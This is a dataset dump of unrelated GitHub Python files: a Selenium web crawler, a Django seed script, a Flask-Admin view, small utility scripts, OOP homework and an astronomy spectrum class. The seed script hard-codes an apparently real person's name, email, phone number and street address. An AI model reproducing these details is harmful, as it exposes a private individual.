stop search\n                return\n\n        # update pointer to next found url to search\n        if inc_searched:\n            self.urls_searched += 1\n\n        if self.urls_found == self.urls_searched:\n            print(\"ERROR: Ran out of links to search from\")\n            return\n\n        # search the next url in the list\n        self.__search_url(self.url_array[self.urls_searched])\n\n    def cleanup(self):\n        \"\"\"\n        Quits the Selenium driver.\n\n        :return: None\n        \"\"\"\n        self.driver.quit()\n\n    # ============= Helper methods =============\n\n    def __get_html_fp(self, url):\n        \"\"\"\n        Returns a file path to store the HTML obtained from the given URL.\n\n        :param url: A valid URL\n        :return: Path object\n        \"\"\"\n        filename = f\"{tldextract.extract(url).domain}-{self.urls_searched}.html\"\n        return self.html_dir / filename\n\n    def __download_html(self, url, html_fp):\n        \"\"\"\n        Uses Selenium and Firefox to download the HTML code from the given URL,\n        and writes it to html_fp.\n\n        :param url: URL to download HTML from\n        :param html_fp: Path to write HTML code to\n        :return: 0 on success, -1 if error\n        \"\"\"\n        try:\n            # open url\n            
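# driver.get blocks until the page loads or the 20-second page-load timeout set in __init__ fires\n            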
self.driver.get(url)\n\n            # render js\n            outer_html = self.driver.execute_script(\n                \"return document.documentElement.outerHTML;\"\n            )\n\n            # save html to file\n            with open(html_fp, 'w') as fp:\n                fp.write(outer_html)\n        except TimeoutException:\n            print(f\"{url} timed out\")\n            return -1\n        except Exception:\n            print(f\"Unknown error with {url}\")\n            return -1\n\n        return 0\n\n    def __get_html_link_soup(self, url):\n        \"\"\"\n        Downloads HTML from the given URL and parses it using BeautifulSoup,\n        filtering it to leave only the <a> tags.\n\n        :param url: URL to parse\n        :return: BeautifulSoup object\n        \"\"\"\n        html_fp = self.__get_html_fp(url)\n\n        if self.__download_html(url, html_fp) < 0:\n            # download failed\n            return None\n\n        with open(html_fp, 'r') as fp:\n            site_content = fp.read()\n\n        # create soup object\n        # only keep <a> tags\n        soup = BeautifulSoup(site_content, 'html.parser', parse_only=SoupStrainer(\"a\"))\n        return soup\n\n    @staticmethod\n    def __get_valid_urls(link_soup):\n        \"\"\"\n        Checks the given BeautifulSoup object for 'href' attributes containing valid URLs\n        and collates the URLs into a list. link_soup is assumed to only contain <a> tags.\n\n        :param link_soup: BeautifulSoup object containing only <a> tags\n        :return: List of valid URLs\n        \"\"\"\n        valid_urls = []\n        for link in link_soup:\n            if hasattr(link, 'href'):\n                try:\n                    url = link['href']\n                    if is_url(url):\n                        valid_urls.append(url)\n                except KeyError:\n                    # ignore this link\n                    continue\n        return valid_urls\n\n    def __find_urls(self, link_soup):\n        \"\"\"\n        Obtains an array of unique links from link_soup and stores them into url_array.\n        If the total number of links found exceeds TARGET_URLS, it only stores the first\n        n links needed to reach the target number, in the order they were found. Updates\n        urls_found accordingly.\n\n        link_soup is assumed to only contain <a> tags.\n\n        :param link_soup: BeautifulSoup object containing only <a> tags\n        :return: None\n        \"\"\"\n        links = self.__get_valid_urls(link_soup)\n        link_arr = np.array(links, dtype=object)\n\n        # narrow list to unique links to be added to url_array\n        link_arr = np.unique(link_arr)\n        # url_array must be unique\n        link_arr = np.setdiff1d(link_arr, self.url_array, assume_unique=True)\n\n        links_left = TARGET_URLS - self.urls_found\n        links_found = get_np_arrlen(link_arr)\n        if links_found <= links_left:\n            # all links can fit in url_array\n            self.url_array[self.urls_found:self.urls_found + links_found] = link_arr\n            self.urls_found += links_found\n        else:\n            # fill the rest of url_array\n            rem_links = link_arr[0:links_left]\n            self.url_array[self.urls_found:] = rem_links\n            self.urls_found = TARGET_URLS\n\n\n# ===========================\n# Helper functions\n# ===========================\n\n\ndef is_url(cand_str):\n    \"\"\"\n    Returns True if cand_str is a properly-formatted URL.\n\n    :param cand_str: String\n    :return: Boolean\n    \"\"\"\n    parse_result = urlparse(cand_str)\n    return parse_result.scheme != \"\" and parse_result.netloc != \"\"\n\n\ndef get_np_arrlen(arr):\n    \"\"\"\n    Returns the length of a 1-dimensional numpy array.\n\n    :param arr: numpy array\n    :return: int\n    \"\"\"\n    return arr.shape[0]\n\n\n# ===========================\n# Main program\n# ===========================\n\n\ndef main(url):\n    # sanity check on input url\n    if not is_url(url):\n        print(\"Invalid url given. Please try again with a valid url.\")\n        sys.exit(-1)\n\n    wc = SimpleWebCrawler(url)\n    wc.search()\n\n    print(f\"Found {wc.urls_found} unique URLs:\")\n    for i, found_url in enumerate(wc.url_array):\n        print(f\"{i + 1}. 
{found_url}\")\n\n    wc.cleanup()\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) == 2:\n        main(sys.argv[1])\n    else:\n        print(\"Incorrect number of arguments. Correct format: python3 webcrawler.py <url>\")\n","repo_name":"avrilwongaw/simple-webcrawler","sub_path":"webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"1766066450","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'generique_project.settings')\n\nimport django\ndjango.setup()\n\n\nfrom travel.models import Mission, Contact, Address\nfrom faker import Faker\nfake = Faker()\n\ndef seed():\n    address = Address(city='Brooklyn', street='778 Lincoln Place', state='NY', zip=11216)\n    address.save()\n\n    kenneth = Contact(name='kenneth mendonca', email='mendonca.kr@Gmail.com', phone=9099640670, address=address)\n    kenneth.save()\n\n    for num in range(100):\n        mission = Mission(description=fake.sentence(),\n                          anything_else=fake.sentence(),\n                          address=address,\n                          contact=kenneth\n                          )\n        mission.save()\n\nif __name__ == '__main__':\n    print(\"Seeding Travel database....\")\n    seed()","repo_name":"mendoncakr/InternetAdventureClub","sub_path":"seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"16765129896","text":"from flask import flash\nfrom flask import request\nfrom flask import url_for\nfrom flask_admin.helpers import get_form_data\nfrom markupsafe import Markup\nfrom markupsafe import escape\nfrom sqlalchemy.orm import query\nfrom wtforms import BooleanField\nfrom wtforms import Form\nfrom wtforms.fields.core import IntegerField\nfrom wtforms.form import BaseForm\nfrom wtforms.validators import Optional\nfrom wtforms_sqlalchemy.fields import QuerySelectField\n\nfrom pcapi.admin.base_configuration import BaseAdminView\nfrom pcapi.core.offerers.models import Venue\nfrom pcapi.core.providers import api\nfrom pcapi.core.providers import exceptions\nfrom pcapi.core.providers.models import AllocineVenueProvider\nfrom pcapi.core.providers.models import AllocineVenueProviderPriceRule\nfrom pcapi.core.providers.models import VenueProvider\nfrom pcapi.core.providers.repository import get_active_providers_query\nfrom pcapi.repository import repository\nfrom pcapi.workers.venue_provider_job import venue_provider_job\n\n\ndef _venue_link(view, context, model, name) -> Markup:\n    url = url_for(\"venue.index_view\", id=model.venueId)\n    return Markup('<a href=\"{}\">Lieu associé</a>').format(escape(url))\n\n\ndef _get_venue_name_and_id(venue: Venue) -> str:\n    return f\"{venue.name} (#{venue.id})\"\n\n\nclass VenueProviderView(BaseAdminView):\n    can_edit = True\n    can_create = False\n    can_delete = False\n\n    column_list = [\n        \"venue.name\",\n        \"venue.siret\",\n        \"provider.name\",\n        \"venueIdAtOfferProvider\",\n        \"isActive\",\n        \"isDuo\",\n        \"quantity\",\n        \"provider.isActive\",\n        \"venue_link\",\n    ]\n    column_labels = {\n        \"venue.id\": \"Id du lieu\",\n        \"venue\": \"Lieu\",\n        \"venue.name\": \"Nom du lieu\",\n        \"venue.siret\": \"Siret du lieu\",\n        \"provider.name\": \"Provider\",\n        \"venueIdAtOfferProvider\": \"Identifiant pivot (SIRET par défaut)\",\n        \"isActive\": \"Import activé\",\n        \"isDuo\": \"En duo ? 
(Allocine seulement)\",\n \"quantity\": \"Quantité (Allocine seulement)\",\n \"provider.isActive\": \"Provider activé\",\n \"venue_link\": \"Lien\",\n }\n\n column_default_sort = (\"id\", True)\n column_searchable_list = [\"venue.name\", \"venue.siret\", \"provider.name\"]\n column_filters = [\"venue.id\", \"venue.name\", \"venue.siret\", \"provider.name\"]\n form_columns = [\"venue\", \"provider\", \"venueIdAtOfferProvider\", \"isActive\"]\n form_extra_fields = [\"allocine_is_duo\", \"allocine_quantity\", \"allocine_price\"]\n\n form_args = dict(\n provider=dict(\n get_label=\"name\",\n ),\n venue=dict(get_label=_get_venue_name_and_id, label=\"Nom du lieu\"),\n )\n\n def edit_form(self, obj=None) -> Form:\n form_class = self.get_edit_form()\n is_allocine = isinstance(obj, AllocineVenueProvider)\n\n form_class.allocine_is_duo = (\n BooleanField(\n default=obj.isDuo if is_allocine else None,\n label=\"En duo (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n form_class.allocine_quantity = (\n IntegerField(\n default=obj.quantity if is_allocine else None,\n label=\"Quantité (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n form_class.allocine_price = (\n IntegerField(\n default=obj.priceRules[0].price if is_allocine and obj.priceRules else None,\n label=\"Prix (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n\n return form_class(get_form_data(), obj=obj)\n\n def get_query(self) -> query:\n return self._extend_query(super().get_query())\n\n def get_count_query(self) -> query:\n return self._extend_query(super().get_count_query())\n\n @property\n def column_formatters(self):\n formatters = super().column_formatters\n formatters.update(venue_link=_venue_link)\n return formatters\n\n @staticmethod\n def _extend_query(query_to_override: query) -> query:\n venue_id = request.args.get(\"id\")\n\n if venue_id:\n return query_to_override.filter(VenueProvider.venueId == venue_id)\n\n return query_to_override\n\n def scaffold_form(self) -> BaseForm:\n form_class = super().scaffold_form()\n form_class.provider = QuerySelectField(query_factory=get_active_providers_query, get_label=\"name\")\n\n return form_class\n\n def update_model(self, form: Form, model: VenueProvider) -> None: # pylint: disable=too-many-return-statements\n if form.venue.data.id != model.venue.id:\n flash(\"Le lieu ne peut pas changer\", \"error\")\n return None\n\n if model.provider.isAllocine:\n if form.provider.data.id != model.provider.id:\n flash(\"Le provider de ce lieu ne peut pas être modifié\", \"error\")\n return None\n\n if form.allocine_price.data is not None or form.allocine_price.data != \"\":\n price_rule = AllocineVenueProviderPriceRule.query.filter_by(\n allocineVenueProviderId=model.id\n ).one_or_none()\n if not price_rule:\n flash(\"Aucun PriceRule n'a été trouvé\")\n return None\n price_rule.price = form.allocine_price.data\n repository.save(price_rule)\n\n if form.allocine_quantity.data is not None or form.allocine_quantity.data != \"\":\n model.quantity = form.allocine_quantity.data\n\n if form.allocine_is_duo.data is not None or form.allocine_is_duo.data != \"\":\n model.isDuo = form.allocine_is_duo.data\n\n venue_provider_job.delay(model.id)\n return super().update_model(form, model)\n\n if form.provider.data.id == model.provider.id:\n venue_provider_job.delay(model.id)\n return super().update_model(form, model)\n\n if form.provider.data.isAllocine:\n flash(\"Le provider ne peut pas être changé pour Allociné\", \"error\")\n 
return None\n\n venue_provider = None\n try:\n venue_provider = api.change_venue_provider(\n model,\n form.provider.data.id,\n form.venueIdAtOfferProvider.data,\n )\n venue_provider_job.delay(venue_provider.id)\n except exceptions.VenueSiretNotRegistered as exc:\n flash(\n f\"L'identifiant pivot {exc.siret} n'est pas reconnu par {exc.provider_name}.\",\n \"error\",\n )\n except exceptions.NoSiretSpecified:\n flash(\"Le siret du lieu n'est pas défini, veuillez en définir un\", \"error\")\n except exceptions.ConnexionToProviderApiFailed:\n flash(\"Problème de connexion à l'API du provider\", \"error\")\n except exceptions.ProviderNotFound:\n flash(\"Aucun provider actif n'a été trouvé\", \"error\")\n except exceptions.ProviderWithoutApiImplementation:\n flash(\"Le provider choisi n'implémente pas notre api\", \"error\")\n except exceptions.NoAllocinePivot:\n flash(\"Aucun AllocinePivot n'est défini pour ce lieu\", \"error\")\n except exceptions.NoPriceSpecified:\n flash(\"Il est obligatoire de saisir un prix\", \"error\")\n except exceptions.VenueProviderException:\n flash(\"Le provider n'a pas pu être enregistré\", \"error\")\n\n return venue_provider\n","repo_name":"pass-culture/pass-culture-api","sub_path":"api/src/pcapi/admin/custom_views/venue_provider_view.py","file_name":"venue_provider_view.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"15487907095","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\n\ndef disk_usage(path):\n \"\"\"Return the number of bytes used by a file/folder and any descendents.\n \"\"\"\n total = os.path.getsize(path) # account for direct usage\n if os.path.isdir(path): # if this is a directory\n for filename in os.listdir(path): # then for each child\n childpath = os.path.join(path, filename) # compose full path to child\n total += disk_usage(childpath)\n\n print('{0:<7}'.format(total), path)\n return total\n\n\nif __name__ == '__main__':\n disk_usage('/tmp')\n","repo_name":"nixawk/hello-python3","sub_path":"os/os-disk_usage.py","file_name":"os-disk_usage.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"72745897056","text":"import stock_plot as plot\nimport stock_profile as sp\n\n\ndef lambda_function(event, context):\n interval = event['interval']\n columns = int(event['columns'])\n stocks = []\n for rec in event['data']:\n stocks.append(sp.StockProfile(rec['name'], rec['cost'], rec['total'],\n interval=interval))\n stock_output = plot.get(stocks, columns=columns)\n return {\n 'StatusCode': 200,\n 'ContentType': 'text/html',\n 'Content': stock_output\n }\n\n\nif __name__ == \"__main__\":\n lambda_function(\"\", \"\")\n","repo_name":"DeadlyChambers/my-stock","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20254057203","text":"#! 
/usr/bin/env python\n\n#\n# William Shanks Bot\n#\n# See https://youtu.be/DmfxIhmGPP4\n#\n# Useful for finding the length of the repeating digits for\n# the inverse of a prime number.\n#\n# As an example:\n#\n# $ for num in 60013 60017 60029 60037 60041; do ./inverse.py $num; done\n# 5001\n# 60016\n# 60028\n# 10006\n# 7505\n#\n# Worst case is that this runs O(N) times where N is the prime being used.\n#\n\nimport sys\n\n\n# Generator returns both the modulus and floor division of the number\n# starting with the inverse of the number\ndef decimals(number):\n    dividend = 1\n    while dividend:\n        yield dividend, dividend // number\n        dividend = dividend % number * 10\n\n\ndef main():\n    num = sys.argv[1]\n    # Fast lookup of dividends\n    table = {}\n    # Count the number of decimal places\n    inverse = []\n\n    gen = decimals(int(num))\n    for dividend, val in gen:\n        if dividend in table and dividend > 0:\n            break\n        inverse.append(val)\n        table[dividend] = True\n    # Print the entire decimal up to the repeat point\n    # print(\n    #     \"{}.{}\".format(\n    #         str(inverse[0]),\n    #         \"\".join(map(str, inverse[1:])),\n    #     )\n    # )\n    # subtract 1 for the zero (0) preceding the decimal place\n    print(len(inverse[1:]))\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"chrisgilmerproj/silliness","sub_path":"shanksbot/shanksbot.py","file_name":"shanksbot.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}{"seq_id":"31217999550","text":"# 1.\r\n# class Laptop:\r\n#     \"\"\"\r\n#     Make the class with composition.\r\n#     \"\"\"\r\n#     class Battery:\r\n#         \"\"\"\r\n#         Make the class with composition.\r\n#         \"\"\"\r\nimport dataclasses\r\nimport collections\r\n\r\n\r\nclass Laptop:\r\n    def __init__(self):\r\n        self.battery = Battery(2600)\r\n\r\n    def __str__(self):\r\n        return f'laptop object - {self.__repr__()}'\r\n\r\n\r\nclass Battery:\r\n    def __init__(self, capacity: int):\r\n        \"\"\"\r\n\r\n        :param capacity: mAh\r\n        \"\"\"\r\n        self.capacity = capacity\r\n\r\n    def __str__(self):\r\n        return f'battery object - {self.__repr__()}'\r\n\r\n\r\nlaptop_instance_0 = Laptop()\r\nprint(laptop_instance_0, laptop_instance_0.battery, sep='\\n')\r\ndel laptop_instance_0\r\nprint('laptop_instance_0 deleted')\r\n\r\ntry:\r\n    print(laptop_instance_0)\r\nexcept NameError:\r\n    print('laptop_instance_0 doesn\'t exist')\r\n\r\ntry:\r\n    print(laptop_instance_0.battery)\r\nexcept NameError:\r\n    print('laptop_instance_0.battery doesn\'t exist')\r\n\r\n\r\n# 2.\r\n# class Guitar:\r\n#     \"\"\"\r\n#     Make the class with aggregation\r\n#     \"\"\"\r\n#     class GuitarString:\r\n#         \"\"\"\r\n#         Make the class with aggregation\r\n#         \"\"\"\r\nclass GuitarString:\r\n    def __init__(self):\r\n        pass\r\n\r\n    def __str__(self):\r\n        return f'guitar_string object - {self.__repr__()}'\r\n\r\n\r\nclass Guitar:\r\n    def __init__(self, guitar_string: GuitarString):\r\n        self.guitar_string = guitar_string\r\n\r\n    def __str__(self):\r\n        return f'guitar object - {self.__repr__()}'\r\n\r\n\r\nguitar_string_instance_0 = GuitarString()\r\nguitar_instance_0 = Guitar(guitar_string_instance_0)\r\nprint(guitar_instance_0, guitar_string_instance_0, sep='\\n')\r\n\r\ndel guitar_instance_0\r\n\r\ntry:\r\n    print(guitar_instance_0)\r\nexcept NameError:\r\n    print('guitar_instance_0 doesn\'t exist')\r\n\r\ntry:\r\n    print(guitar_string_instance_0)\r\nexcept NameError:\r\n    print('guitar_string_instance_0 doesn\'t exist')\r\n\r\n\r\n# 3.\r\n# class Calc:\r\n#     \"\"\"\r\n#     Make class with one method \"add_nums\" with 3 
parameters, which returns sum of these parameters.\r\n# Note: this method should not take instance as first parameter.\r\n# \"\"\"\r\nclass Calc:\r\n\r\n @staticmethod\r\n def add_nums(first_arg, second_arg, third_arg):\r\n return sum((first_arg, second_arg, third_arg))\r\n\r\n\r\nprint(f'sum of {1, 5, 7} - {Calc.add_nums(1, 5, 7)}')\r\n\r\n\r\n# 4*.\r\n# class Pasta:\r\n# \"\"\"\r\n# Make class which takes 1 parameter on init - list of ingredients and defines instance attribute ingredients.\r\n# It should have 2 methods:\r\n# carbonara (['forcemeat', 'tomatoes']) and bolognaise (['bacon', 'parmesan', 'eggs'])\r\n# which should create Pasta instances with predefined list of ingredients.\r\n# Example:\r\n# pasta_1 = Pasta([\"tomato\", \"cucumber\"])\r\n# pasta_1.ingredients will equal to [\"tomato\", \"cucumber\"]\r\n# pasta_2 = Pasta.bolognaise()\r\n# pasta_2.ingredients will equal to ['bacon', 'parmesan', 'eggs']\r\n# \"\"\"\r\nclass Pasta:\r\n def __init__(self, ingredients: list):\r\n self.ingredients = ingredients\r\n\r\n @classmethod\r\n def carbonara(cls):\r\n \"\"\"\r\n create Pasta object with ingredients from list - ['forcemeat', 'tomatoes']\r\n :return: Pasta object\r\n \"\"\"\r\n return Pasta(['forcemeat', 'tomatoes'])\r\n\r\n @classmethod\r\n def bolognaise(cls):\r\n \"\"\"\r\n create Pasta object with ingredients from list - ['bacon', 'parmesan', 'eggs']\r\n :return: Pasta object\r\n \"\"\"\r\n return Pasta(['bacon', 'parmesan', 'eggs'])\r\n\r\n\r\npasta_1 = Pasta([\"tomato\", \"cucumber\"])\r\nprint(f'ingredients of pasta_1 - {pasta_1.ingredients}') # will equal to [\"tomato\", \"cucumber\"]\r\npasta_2 = Pasta.bolognaise()\r\nprint(f'ingredients of pasta_2 - {pasta_2.ingredients}') # will equal to ['bacon', 'parmesan', 'eggs']\r\n\r\n\r\n# 5*.\r\n# class Concert:\r\n# \"\"\"\r\n# Make class, which has max_visitors_num attribute and its instances will have visitors_count attribute.\r\n# In case of setting visitors_count - max_visitors_num should be checked,\r\n# if visitors_count value is bigger than max_visitors_num - visitors_count should be assigned with max_visitors_num.\r\n# Example:\r\n# Concert.max_visitor_num = 50\r\n# concert = Concert()\r\n# concert.visitors_count = 1000\r\n# print(concert.visitors_count) # 50\r\n# \"\"\"\r\nclass Concert:\r\n max_visitors_num = 0\r\n\r\n def __init__(self):\r\n self._visitors_count = 0\r\n\r\n def set_visitors_count(self, visitors_count):\r\n self._visitors_count = visitors_count if visitors_count < self.max_visitors_num else self.max_visitors_num\r\n\r\n def get_visitors_count(self):\r\n return self._visitors_count\r\n\r\n visitors_count = property(fget=get_visitors_count, fset=set_visitors_count)\r\n\r\n\r\nConcert.max_visitors_num = 50\r\nconcert = Concert()\r\nconcert.visitors_count = 1000\r\nprint(f'concert visitors - {concert.visitors_count}') # 50\r\n\r\n\r\n# 6.\r\n# class AddressBookDataClass:\r\n# \"\"\"\r\n# Create dataclass with 7 fields - key (int), name (str), phone_number (str), address (str), email (str),\r\n# birthday (str), age (int)\r\n# \"\"\"\r\n@dataclasses.dataclass()\r\nclass AddressBookDataClass:\r\n key: int\r\n name: str\r\n phone_number: str\r\n address: str\r\n email: str\r\n birthday: str\r\n age: int\r\n\r\n\r\naddress_book_instance_0 = AddressBookDataClass(key=0, name='Pasha', phone_number='354', address='Lviv',\r\n email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\n# 7. 
Create the same class (6) but using NamedTuple\r\nAddressBookDataClass_ = collections.namedtuple('AddressBookDataClass', ['key', 'name', 'phone_number', 'address',\r\n                                                                        'email', 'birthday', 'age'])\r\n\r\naddress_book_instance_1 = AddressBookDataClass_(key=1, name='Pasha', phone_number='354', address='Lviv',\r\n                                                email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\nprint(f'address_book_instance_0 (dataclass) - {address_book_instance_0}')\r\nprint(f'address_book_instance_1 (namedtuple) - {address_book_instance_1}')\r\n\r\n\r\n# 8.\r\n# class AddressBook:\r\n#     \"\"\"\r\n#     Create regular class taking 7 params on init - key, name, phone_number, address, email, birthday, age\r\n#     Make its str() representation the same as for AddressBookDataClass defined above.\r\n#     \"\"\"\r\nclass AddressBook:\r\n    def __init__(self, key, name, phone_number, address, email, birthday, age):\r\n        self.key = key\r\n        self.name = name\r\n        self.phone_number = phone_number\r\n        self.address = address\r\n        self.email = email\r\n        self.birthday = birthday\r\n        self.age = age\r\n\r\n    def __str__(self):\r\n        return f'AddressBookDataClass(key={self.key}, name={self.name}, phone_number={self.phone_number}, ' \\\r\n               f'address={self.address}, email={self.email}, birthday={self.birthday}, age={self.age})'\r\n\r\n\r\naddress_book_instance_2 = AddressBook(key=2, name='Pasha', phone_number='354', address='Lviv',\r\n                                      email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\nprint(f'address_book_instance_2 (regular class) - {address_book_instance_2}')\r\n\r\n\r\n# 9.\r\n# class Person:\r\n#     \"\"\"\r\n#     Change the value of the age property of the person object\r\n#     \"\"\"\r\n#     name = \"John\"\r\n#     age = 36\r\n#     country = \"USA\"\r\n#\r\nclass Person:\r\n    name = \"John\"\r\n    age = 36\r\n    country = \"USA\"\r\n\r\n\r\nperson_instance_0 = Person()\r\nprint(f'person_instance_0 age before change - {person_instance_0.age}')\r\nperson_instance_0.age += 1\r\nprint(f'person_instance_0 age after change - {person_instance_0.age}')\r\n\r\n\r\n# 10.\r\n# class Student:\r\n#     \"\"\"\r\n#     Add an 'email' attribute of the object student and set its value\r\n#     Assign the new attribute to 'student_email' variable and print it by using getattr\r\n#     \"\"\"\r\n#     id = 0\r\n#     name = \"\"\r\n#\r\n#     def __init__(self, id, name):\r\n#         self.id = id\r\n#         self.name = name\r\nclass Student:\r\n    student_id = 0\r\n    name = ''\r\n\r\n    def __init__(self, student_id, name):\r\n        self.student_id = student_id\r\n        self.name = name\r\n\r\n\r\nstudent_instance_0 = Student(1234, 'Pasha')\r\nsetattr(student_instance_0, 'email', f'{student_instance_0.name}{student_instance_0.student_id}' + '@university.com')\r\nprint(f'email of student {student_instance_0.name} (id - {student_instance_0.student_id}) - '\r\n      f'{getattr(student_instance_0, \"email\")}')\r\n\r\n\r\n# 11*.\r\n# class Celsius:\r\n#     \"\"\"\r\n#     By using @property convert the celsius to fahrenheit\r\n#     Hint: (temperature * 1.8) + 32\r\n#     \"\"\"\r\n#     def __init__(self, temperature=0):\r\n#         self._temperature = temperature\r\n#\r\n#\r\n# # create an object\r\n# {obj} = ...\r\n#\r\n# print({obj}.temperature)\r\nclass Celsius:\r\n    def __init__(self, temperature=0):\r\n        self._temperature = temperature\r\n\r\n    @property\r\n    def temperature(self):\r\n        return self._temperature * 1.8 + 32\r\n\r\n\r\ntemperature_instance_0 = Celsius()\r\nprint(f'temperature - 
{temperature_instance_0.temperature}')\r\n","repo_name":"tomkovyd-pasha/cursor_hw","sub_path":"HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6591245879","text":"# Internal python modules\nimport os\nfrom textwrap import fill\nimport time\nimport pickle\nimport json\nimport toml\nimport copy\nimport gc\nimport itertools\nimport uuid\n\n# External packages\nimport tqdm\nimport numpy as np\nimport pandas as pd\nfrom numba import jit, njit, prange\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.colors as mplcolor\nimport plotly.subplots\nimport plotly.graph_objects\nfrom joblib import Parallel, delayed\n\nimport scipy.optimize\nimport scipy.integrate\nimport scipy.interpolate\nimport scipy.special\n\nimport astropy.coordinates\nimport astropy.time\nimport astropy.io.fits\nimport astropy.units as u\nimport astropy.constants as const\nimport astropy.convolution\n\nimport astroquery.irsa_dust\nfrom PyAstronomy.pyasl import fastRotBroad\n# import spectres\n\n# Bifrost packages\nimport bifrost.maths as maths\nimport bifrost.utils as utils\nimport bifrost.filters as bfilters\n\n\nclass Spectrum:\n __slots__ = ['wave', 'flux', 'error', 'sky', 'redshift', 'velocity', 'ra', 'dec', 'ebv', 'name', 'output_path',\n '_corrected', 'data', '_normalized']\n\n def __init__(self, wave, flux, error, sky=None, redshift=None, velocity=None, ra=None, dec=None, ebv=None, name='Generic',\n output_path=None, **data):\n \"\"\"\n A class containing data and attributes for a single spectrum of an astronomical object.\n\n :param wave: np.ndarray\n Array of the observed wavelength range of the spectrum, not corrected for redshift, in angstroms.\n :param flux: np.ndarray\n Array of the observed flux of the object over the wavelength range, not corrected for extinction, in\n 10^-17 erg cm^-2 s^-1 angstrom^-1.\n :param error: np.ndarray\n Array of the error associated with the observed flux, also in units of 10^-17 erg cm^-2 s^-1 angstrom^-1.\n :param redshift: float\n Redshift of the object in dimensionless units.\n ***IMPORTANT***\n If none is provided, it is assumed the given wavelength is already corrected to be in the rest frame of the\n source.\n :param velocity: float\n Radial velocity of the object in km/s. 
An alternative that can be used to calculate the redshift if z is\n not known.\n :param ra: float\n Right ascension in hours.\n :param dec: float\n Declination in degrees.\n :param ebv: float\n Extinction (B-V) color of the object in mag.\n ***IMPORTANT***\n If none is provided, it is assumed the given flux is already corrected for galactic extinction.\n :param name: str\n An identifier for the object spectrum.\n :param data: dict\n Any other parameters that might want to be sorted by.\n :param output_path: str\n A directory where saved files will default to if none is given.\n \"\"\"\n # Observed wavelength array in angstroms\n self.wave = wave\n # Observed flux array in 10^-17 * CGS units\n self.flux = flux\n # Flux error in 10^-17 * CGS units\n self.error = error\n # Sky flux in 10^-17 * CGS units\n self.sky = sky\n # Redshift in units of c\n self.redshift = redshift\n self.velocity = velocity\n # Coordinates\n self.ra = ra\n self.dec = dec\n # Extinction in (B-V) magnitudes\n self.ebv = ebv\n # Name\n self.name = name\n # Output path\n if not output_path:\n output_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'data', self.name)\n self.output_path = output_path\n # Verify that everything makes sense\n self._verify()\n self._corrected = False\n self._normalized = False\n\n # Other properties that might want to be sorted by\n self.data = data\n\n def __repr__(self):\n s = '########################################################################################\\n'\n s += f\"{self.name} Spectrum \\n\"\n s += '########################################################################################\\n'\n corrstr = \"(corrected)\" if self._corrected else \"(uncorrected)\"\n s += f\"Wavelength range \" + corrstr + f\": \\t {np.min(self.wave)} - {np.max(self.wave)} angstroms\\n\"\n s += f\"Flux range: \\t {np.max(np.concatenate(([np.min(self.flux)], [0.0])))} - \" \\\n f\"{np.max(self.flux)} * \" \\\n f\"{'10^-17 erg cm^-2 s^-1 angstrom^-1' if not self.normalized else 'normalized units'}\\n\"\n s += f\"Redshift: \\t z = {self.redshift}\\n\"\n s += f\"Extinction: \\t E(B-V) = {self.ebv}\\n\"\n return s\n\n def _verify(self):\n \"\"\"\n Verify that the information in the object makes sense. i.e. 
the size of wave, flux, and error are all the same.\n\n :return None:\n \"\"\"\n assert self.wave.size == self.flux.size == self.error.size, \\\n \"Wave, flux, and error arrays must be the same size!\"\n\n def apply_corrections(self, r_v=3.1):\n \"\"\"\n Apply all corrections to the spectrum: redshift and extinction\n\n :param r_v: float\n extinction ratio A(V)/E(B-V), default 3.1\n :return None:\n \"\"\"\n if not self._corrected:\n if self.redshift:\n self.wave = maths.cosmological_redshift(self.wave, self.redshift)\n elif self.velocity:\n self.redshift = maths.calc_redshift_sqrt(self.velocity)\n self.wave = maths.cosmological_redshift(self.wave, self.redshift)\n if self.ebv:\n self.flux = maths.correct_extinction(self.wave, self.flux, self.ebv, r_v)\n self._corrected = True\n\n def calc_snr(self):\n if 'snr' not in self.data:\n med = np.nanmedian(self.flux)\n self.data['snr'] = 1 / np.mean(self.error[np.where(np.isfinite(self.error))[0]] / med)\n return self.data['snr']\n\n def calc_line_snr(self, wave_range, key):\n good = np.where(np.isfinite(self.error) & (wave_range[0] < self.wave) & (self.wave < wave_range[1]))[0]\n med = np.nanmedian(self.flux[good])\n self.data[key] = 1 / np.mean(self.error[good] / med)\n return self.data[key]\n\n @property\n def corrected(self):\n return self._corrected\n\n @corrected.setter\n def corrected(self, value):\n raise ValueError(\"The 'corrected' property may not be manually set!\")\n\n @corrected.deleter\n def corrected(self):\n raise ValueError(\"The 'corrected' property may not be deleted!\")\n\n @property\n def normalized(self):\n return self._normalized\n\n @normalized.setter\n def normalized(self, value):\n raise ValueError(\"The 'normalized' property may not be manually set!\")\n\n 